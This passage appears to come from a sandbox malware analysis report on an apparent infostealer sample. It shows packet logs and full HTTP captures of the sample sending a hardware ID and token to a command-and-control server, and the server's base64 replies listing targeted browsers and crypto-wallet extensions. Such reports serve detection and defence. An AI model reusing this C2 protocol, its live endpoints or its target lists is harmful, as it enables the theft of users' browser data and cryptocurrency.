                                                                Jun 27, 2024 05:59:58.919879913 CEST4978380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:58.920141935 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:58.925132036 CEST8049784147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:58.925220966 CEST8049783147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:58.925318956 CEST4978380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:58.925344944 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:58.925432920 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:58.930425882 CEST8049784147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:59.601511002 CEST8049784147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:59.601689100 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.602433920 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.607198000 CEST8049784147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:59.811300993 CEST8049784147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:59.811398983 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.919940948 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.920335054 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.925225019 CEST8049785147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:59.925328970 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.925334930 CEST8049784147.45.47.155192.168.2.6
                                                                Jun 27, 2024 05:59:59.925395966 CEST4978480192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.925549984 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 05:59:59.930509090 CEST8049785147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:00.637893915 CEST8049785147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:00.637970924 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.638804913 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.643589973 CEST8049785147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:00.847273111 CEST8049785147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:00.847408056 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.953097105 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.953445911 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.958158970 CEST8049785147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:00.958237886 CEST4978580192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.958331108 CEST8049786147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:00.958408117 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.958560944 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:00.963304043 CEST8049786147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:01.664920092 CEST8049786147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:01.664995909 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:01.665698051 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:01.670600891 CEST8049786147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:01.884692907 CEST8049786147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:01.884794950 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:01.997916937 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:01.998261929 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:02.003910065 CEST8049786147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:02.003978968 CEST4978680192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:02.004476070 CEST8049787147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:02.004554987 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:02.004724979 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:02.009485960 CEST8049787147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:02.690073967 CEST8049787147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:02.690159082 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:02.690891027 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:02.695677042 CEST8049787147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:02.901916027 CEST8049787147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:02.902858019 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.015830994 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.016169071 CEST4978880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.021157980 CEST8049788147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:03.021382093 CEST4978880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.021507025 CEST4978880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.021563053 CEST8049787147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:03.022608042 CEST4978780192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.026329994 CEST8049788147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:03.692101002 CEST8049788147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:03.692167997 CEST4978880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.694713116 CEST4978880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.695089102 CEST4978980192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.699835062 CEST8049789147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:03.699889898 CEST8049788147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:03.699951887 CEST4978880192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.699969053 CEST4978980192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.700114012 CEST4978980192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:03.704900980 CEST8049789147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:04.368448973 CEST8049789147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:04.368509054 CEST4978980192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:04.633620024 CEST4978980192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:04.634797096 CEST4979080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:04.638499975 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 06:00:04.638906002 CEST8049789147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:04.638958931 CEST4978980192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:04.639751911 CEST8049790147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:04.639818907 CEST4979080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:04.639971018 CEST4979080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:04.643738031 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 06:00:04.643857002 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 06:00:04.644691944 CEST8049790147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:05.340662956 CEST8049790147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:05.340739012 CEST4979080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:05.344696045 CEST4979080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:05.345068932 CEST4979180192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:05.349838018 CEST8049790147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:05.349873066 CEST8049791147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:05.350163937 CEST4979080192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:05.350193977 CEST4979180192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:05.350438118 CEST4979180192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:05.355159044 CEST8049791147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.038373947 CEST8049791147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.038549900 CEST4979180192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.157021046 CEST4979180192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.157412052 CEST4979280192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.162942886 CEST8049791147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.162959099 CEST8049792147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.163007021 CEST4979180192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.163044930 CEST4979280192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.163331032 CEST4979280192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.169014931 CEST8049792147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.858150005 CEST8049792147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.858252048 CEST4979280192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.862080097 CEST4979280192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.862607956 CEST4979380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.867223024 CEST8049792147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.868282080 CEST8049793147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:06.868432045 CEST4979280192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.868513107 CEST4979380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.868797064 CEST4979380192.168.2.6147.45.47.155
                                                                Jun 27, 2024 06:00:06.874566078 CEST8049793147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:07.539685965 CEST8049793147.45.47.155192.168.2.6
                                                                Jun 27, 2024 06:00:07.543308973 CEST4979380192.168.2.6147.45.47.155
                                                                • 85.28.47.4
                                                                • 77.91.77.81
                                                                • 147.45.47.155
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.64971185.28.47.4802308C:\Users\user\Desktop\wqmnYoVbHr.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jun 27, 2024 05:58:02.458744049 CEST409OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDA
                                                                Host: 85.28.47.4
                                                                Content-Length: 212
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 33 37 35 37 39 31 41 30 45 41 32 30 33 37 39 30 32 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a
                                                                Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="hwid"ED375791A0EA20379026------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="build"default------DHCAECGIEBKJKEBGDHDA--
                                                                Jun 27, 2024 05:58:03.081305981 CEST384INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:02 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 156
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 4f 57 51 32 4e 44 52 6b 4d 6a 68 6b 4d 32 5a 6c 59 57 4d 77 4d 44 6b 78 4f 54 56 6a 4e 57 59 35 4e 54 55 79 4d 6d 49 77 4d 47 45 77 4e 47 4a 6c 4e 6a 41 34 4e 6d 45 32 4d 57 46 69 4e 32 49 34 4f 54 52 6a 5a 6a 67 79 4d 44 55 33 5a 54 59 30 5a 6a 55 77 5a 54 41 33 4e 47 56 6d 4e 44 41 79 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                Data Ascii: OWQ2NDRkMjhkM2ZlYWMwMDkxOTVjNWY5NTUyMmIwMGEwNGJlNjA4NmE2MWFiN2I4OTRjZjgyMDU3ZTY0ZjUwZTA3NGVmNDAyfGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=
                                                                Jun 27, 2024 05:58:03.113549948 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCA
                                                                Host: 85.28.47.4
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 2d 2d 0d 0a
                                                                Data Ascii: ------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="message"browsers------CBFCFBFBFBKFIDHJKFCA--
                                                                Jun 27, 2024 05:58:03.289501905 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:03 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 1520
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                Jun 27, 2024 05:58:03.289602041 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                Jun 27, 2024 05:58:03.290802002 CEST464OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDG
                                                                Host: 85.28.47.4
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 64 36 34 34 64 32 38 64 33 66 65 61 63 30 30 39 31 39 35 63 35 66 39 35 35 32 32 62 30 30 61 30 34 62 65 36 30 38 36 61 36 31 61 62 37 62 38 39 34 63 66 38 32 30 35 37 65 36 34 66 35 30 65 30 37 34 65 66 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 2d 2d 0d 0a
                                                                Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"9d644d28d3feac009195c5f95522b00a04be6086a61ab7b894cf82057e64f50e074ef402------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="message"plugins------DBKKFCBAKKFBGCBFHJDG--
                                                                Jun 27, 2024 05:58:03.474682093 CEST1236INHTTP/1.1 200 OK
                                                                Date: Thu, 27 Jun 2024 03:58:03 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 5416
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                Jun 27, 2024 05:58:03.474699974 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                Jun 27, 2024 05:58:03.474711895 CEST448INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                Jun 27, 2024 05:58:03.474853992 CEST1236INData Raw: 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 72 61 6d 31 76 62 32
                                                                Data Ascii: b2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWlvamZsamNraWxoaGxoY2p8MXw
                                                                Jun 27, 2024 05:58:03.474865913 CEST1236INData Raw: 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32
